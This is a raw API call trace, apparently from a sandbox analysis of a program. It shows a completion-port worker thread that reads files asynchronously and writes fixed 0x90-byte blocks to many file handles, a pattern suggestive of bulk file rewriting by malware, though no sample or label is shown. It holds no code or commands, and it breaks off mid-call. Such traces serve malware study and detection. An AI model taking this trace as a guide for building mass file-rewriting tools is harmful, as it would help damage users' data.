0x0 [0149.948] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.948] WriteFile (in: hFile=0x630, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 1 [0149.948] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.948] WriteFile (in: hFile=0x638, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 1 [0149.948] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.948] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0149.948] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.949] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0149.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.949] WriteFile (in: hFile=0x1a8, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020) returned 1 [0149.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.949] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0149.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.949] WriteFile (in: hFile=0x368, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020) returned 1 [0149.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.949] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0149.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.949] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5000020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.950] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5120020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.950] WriteFile (in: hFile=0x674, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4940020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.950] WriteFile (in: hFile=0x640, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.950] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5360020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.950] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5240020) returned 1 [0149.950] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.950] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5480020) returned 1 [0149.951] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.951] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x55a0020) returned 1 [0149.951] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.951] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x56c0020) returned 1 [0149.951] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.951] CloseHandle (hObject=0x630) returned 1 [0149.952] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0149.953] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.953] CloseHandle (hObject=0x638) returned 1 [0149.954] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0149.954] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.955] WriteFile (in: hFile=0x670, lpBuffer=0x4b80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4b80020) returned 1 [0149.955] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.955] WriteFile (in: hFile=0x134, lpBuffer=0x4ca0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ca0020) returned 1 [0149.955] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.955] CloseHandle (hObject=0x1a8) returned 1 [0149.956] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0149.956] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.956] WriteFile (in: hFile=0x658, lpBuffer=0x4dc0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4dc0020) returned 1 [0149.956] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.956] CloseHandle (hObject=0x368) returned 1 [0149.957] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0149.958] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.958] WriteFile (in: hFile=0x620, lpBuffer=0x4ee0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ee0020) returned 1 [0149.958] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.958] WriteFile (in: hFile=0x2e0, lpBuffer=0x5000094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5000020) returned 1 [0149.958] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.958] WriteFile (in: hFile=0x644, lpBuffer=0x5120094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5120020) returned 1 [0149.958] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.959] CloseHandle (hObject=0x674) returned 1 [0149.960] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0149.960] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.960] CloseHandle (hObject=0x640) returned 1 [0149.961] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0149.992] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.992] WriteFile (in: hFile=0x648, lpBuffer=0x5360094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5360020 | out: lpBuffer=0x5360094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5360020) returned 1 [0149.995] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.995] WriteFile (in: hFile=0x668, lpBuffer=0x5480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5480020 | out: lpBuffer=0x5480094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5480020) returned 1 [0150.016] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.016] WriteFile (in: hFile=0x67c, lpBuffer=0x56c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x56c0020 | out: lpBuffer=0x56c0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x56c0020) returned 1 [0150.022] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.023] CloseHandle (hObject=0x620) returned 1 [0150.032] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ee0020) returned 1 [0150.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.033] CloseHandle (hObject=0x648) returned 1 [0150.040] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5360020) returned 1 [0150.040] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.043] CloseHandle (hObject=0x664) returned 1 [0150.045] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x55a0020) returned 1 [0150.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.045] CloseHandle (hObject=0x67c) returned 1 [0150.061] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x56c0020) returned 1 [0150.061] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.061] ReadFile (in: hFile=0x67c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.061] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.061] WriteFile (in: hFile=0x67c, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 1 [0150.063] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.063] ReadFile (in: hFile=0x67c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0150.063] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.063] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.063] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.063] WriteFile (in: hFile=0x67c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 1 [0150.065] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.065] CloseHandle (hObject=0x67c) returned 1 [0150.066] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0150.067] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.372] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x41f0020) returned 1 [0150.373] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.373] ReadFile (in: hFile=0x65c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4670020) returned 1 [0150.374] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.374] ReadFile (in: hFile=0x648, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4790020) returned 1 [0150.375] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.375] ReadFile (in: hFile=0x644, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x48b0020) returned 1 [0150.376] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.376] ReadFile (in: hFile=0x658, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x49d0020) returned 1 [0150.377] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.377] ReadFile (in: hFile=0x670, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4af0020) returned 1 [0150.377] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.377] ReadFile (in: hFile=0x61c, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4c10020) returned 1 [0150.378] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.378] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020) returned 1 [0150.379] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.379] WriteFile (in: hFile=0x65c, 